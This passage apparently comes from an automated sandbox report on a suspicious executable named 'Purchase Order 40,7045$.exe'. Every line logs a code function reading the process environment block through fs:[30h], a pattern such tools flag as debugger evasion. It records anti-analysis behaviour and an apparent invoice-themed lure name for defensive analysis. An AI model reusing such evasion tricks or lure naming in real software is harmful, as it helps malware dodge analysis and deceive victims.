          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]